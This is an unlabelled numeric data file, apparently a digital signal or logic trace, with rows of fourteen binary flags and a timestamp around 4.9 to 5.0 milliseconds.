1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8840560e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8840840e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8841080e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,4.8841120e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,4.8841320e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,4.8841560e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,4.8841800e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,4.8842080e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,4.8842320e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,4.8842600e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,4.8842840e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,4.8843080e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,4.8843320e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,4.8843560e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8843640e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8843880e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8844080e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8844320e-03 1,0,1,0,1,0,0,0,0,1,0,0,0,0,4.8844600e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,4.8844640e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,4.8844840e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,4.8845080e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,4.8845320e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,4.8845560e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,4.8845800e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,4.8846080e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,4.8846320e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,4.8846600e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8846640e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8846840e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8847080e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8847320e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8847560e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8847840e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8848080e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8848320e-03 1,0,1,0,1,0,0,0,0,1,0,0,0,0,4.8848600e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,4.8848640e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,4.8848840e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,4.8849080e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,4.8849320e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,4.8849560e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,4.8849800e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,4.8850080e-03 1,0,1,0,1,1,0,0,0,0,0,0,0,0,4.8850120e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8850160e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8850360e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8850600e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8850840e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8851080e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8851560e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8851840e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8852360e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8852600e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8853080e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8853320e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8853840e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8854080e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8854600e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8854840e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8855320e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8855560e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8855800e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8856080e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8856320e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,4.8856600e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,4.8856840e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,4.8857080e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,4.8857320e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,4.8857560e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,4.8857800e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,4.8858080e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,4.8858320e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,4.8858600e-03 1,0,1,0,1,1,0,0,0,0,0,0,0,0,4.8858640e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8858680e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8858840e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8859080e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8859320e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8859560e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8859800e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,4.8860120e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,4.8860360e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,4.8860600e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,4.8860840e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,4.8861120e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,4.8861360e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,4.8861600e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,4.8861880e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,4.8862120e-03 1,0,1,0,1,1,0,0,0,0,0,0,0,0,4.8862160e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8862200e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8862360e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8862600e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8862840e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8863080e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8863640e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8863880e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8864360e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8864600e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8865080e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8865360e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8865880e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8866120e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8866600e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8866840e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8867360e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8867600e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8867880e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8868120e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8868360e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8868600e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8868840e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8869080e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8869360e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8869600e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8869880e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8870120e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8870360e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8870600e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8870840e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8871080e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8871360e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8871600e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8871880e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8872120e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8872360e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8872600e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8872840e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8873080e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8873360e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8873600e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8873880e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8874120e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8874360e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8874600e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8874840e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8875080e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8875360e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8875600e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8875880e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8876120e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8876360e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8876600e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8876840e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8877080e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8877360e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8877600e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8877880e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8878120e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8878360e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8878600e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8878840e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8879080e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8879360e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8879600e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,1,5.0124880e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,1,5.0126600e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,1,5.0126840e-03 0,1,1,0,1,0,0,0,0,0,0,1,0,1,5.0127120e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,1,5.0127400e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,1,5.0130280e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,1,5.0130520e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,1,5.0130760e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,1,5.0131000e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,1,5.0131240e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,1,5.0131480e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,1,5.0131720e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,1,5.0131960e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,1,5.0132240e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,1,5.0132480e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,1,5.0132760e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,1,5.0133000e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0133200e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0133240e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0133480e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0133720e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0133960e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0134240e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0134480e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0134760e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0135000e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0135240e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0135480e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0135720e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0135960e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0136240e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0136480e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0136760e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0137000e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0137200e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0137480e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0137720e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0137960e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0138240e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0138480e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0138760e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0139000e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0139240e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0139480e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0139720e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0139960e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0140240e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0140480e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0140760e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0141000e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0141200e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0141480e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0141720e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0141960e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0142240e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0142480e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0142760e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0143000e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0143240e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0143480e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0143720e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0143960e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0144240e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0144480e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0144760e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0145000e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0145240e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0145480e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0145720e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0145960e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0146240e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0146480e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0146760e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0147000e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0147240e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0147480e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0147720e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0147960e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0148240e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0148480e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0148760e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0149000e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0149240e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0149480e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0149720e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0149960e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0150240e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0150480e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0150760e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0151000e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0151240e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0151480e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0151720e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0151960e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0152240e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0152480e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0152760e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0153000e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0153240e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0153480e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0153720e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0153960e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0154240e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0154480e-03 0,1,1,0,1,1,0,0,0,1,0,0,0,0,5.0154520e-03 0,1,1,0,1,1,0,0,0,1,0,0,1,0,5.0154760e-03 0,1,1,0,1,1,0,0,0,1,0,0,0,0,5.0155000e-03 0,1,1,0,1,1,0,0,0,1,0,0,1,0,5.0155240e-03 0,1,1,0,1,1,0,0,0,1,0,0,0,0,5.0155480e-03 0,1,1,0,1,1,0,0,0,1,0,0,1,0,5.0155720e-03 0,1,1,0,1,1,0,0,0,1,0,0,0,0,5.0155960e-03 0,1,1,0,1,1,0,0,0,1,0,0,1,0,5.0156240e-03 0,1,1,0,1,1,0,0,0,1,0,0,0,0,5.0156480e-03 0,1,1,0,1,1,0,0,0,1,0,0,1,0,5.0156760e-03 0,1,1,0,1,1,0,0,0,1,0,0,0,0,5.0157000e-03 0,1,1,0,1,1,0,0,0,1,0,0,1,0,5.0157240e-03 0,1,1,0,1,1,0,0,0,1,0,0,0,0,5.0157480e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0157560e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0157720e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0157960e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0158240e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0158480e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0158760e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0159000e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0159240e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0159480e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0159720e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0159960e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0160240e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0160480e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0160760e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0161000e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0161240e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0161480e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0161720e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0161960e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0162240e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0162480e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0162760e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0163000e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0163240e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0163480e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0163720e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0163960e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0164240e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0164480e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0164760e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0165000e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0165240e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0165480e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0165720e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0165960e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0166240e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0166480e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0166760e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0167000e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0167240e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0167480e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0167720e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0167960e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0168240e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0168480e-03 0,1,1,0,1,1,0,0,0,1,0,0,0,0,5.0168520e-03 0,1,1,0,1,1,0,0,0,1,0,0,1,0,5.0168760e-03 0,1,1,0,1,1,0,0,0,1,0,0,0,0,5.0169000e-03 0,1,1,0,1,1,0,0,0,1,0,0,1,0,5.0169240e-03 0,1,1,0,1,1,0,0,0,1,0,0,0,0,5.0169480e-03 0,1,1,0,1,1,0,0,0,1,0,0,1,0,5.0169720e-03 0,1,1,0,1,1,0,0,0,1,0,0,0,0,5.0169960e-03 0,1,1,0,1,1,0,0,0,1,0,0,1,0,5.0170240e-03 0,1,1,0,1,1,0,0,0,1,0,0,0,0,5.0170480e-03 0,1,1,0,1,1,0,0,0,1,0,0,1,0,5.0170760e-03 0,1,1,0,1,1,0,0,0,1,0,0,0,0,5.0171000e-03 0,1,1,0,1,1,0,0,0,1,0,0,1,0,5.0171200e-03 0,1,1,0,1,1,0,0,0,1,0,0,0,0,5.0171480e-03 0,1,1,0,1,1,0,0,0,0,0,0,0,0,5.0171520e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0171560e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0171720e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0171960e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0172240e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0172480e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0172760e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0173000e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0173240e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0173480e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0173720e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0173960e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0174240e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0174480e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0174760e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0175000e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0175240e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0175480e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0175720e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0175960e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0176240e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0176480e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0176760e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0177000e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0177200e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0177480e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0177720e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0177960e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0178240e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0178480e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0178760e-03 0,1,1,0,1,0,0,0,0,1,0,0,0,0,5.0179000e-03 0,1,1,0,1,1,0,0,0,1,0,0,0,0,5.0179040e-03 0,1,1,0,1,1,0,0,0,1,0,0,1,0,5.0179240e-03 0,1,1,0,1,1,0,0,0,1,0,0,0,0,5.0179480e-03 0,1,1,0,1,1,0,0,0,1,0,0,1,0,5.0179720e-03 0,1,1,0,1,1,0,0,0,1,0,0,0,0,5.0179960e-03 0,1,1,0,1,1,0,0,0,1,0,0,1,0,5.0180240e-03 0,1,1,0,1,1,0,0,0,1,0,0,0,0,5.0180480e-03 0,1,1,0,1,1,0,0,0,1,0,0,1,0,5.0180760e-03 0,1,1,0,1,1,0,0,0,1,0,0,0,0,5.0181000e-03 0,1,1,0,1,1,0,0,0,1,0,0,1,0,5.0181240e-03 0,1,1,0,1,1,0,0,0,1,0,0,0,0,5.0181480e-03 0,1,1,0,1,1,0,0,0,1,0,0,1,0,5.0181720e-03 0,1,1,0,1,1,0,0,0,1,0,0,0,0,5.0181960e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0182040e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0182240e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0182480e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0182760e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0183000e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0183240e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0183480e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0183720e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0183960e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0184240e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0184480e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0184760e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0185000e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0185240e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0185480e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0185720e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0185960e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0186240e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0186480e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0186760e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0187000e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0187240e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0187480e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0187720e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0187960e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0188240e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0188480e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0188760e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0189000e-03 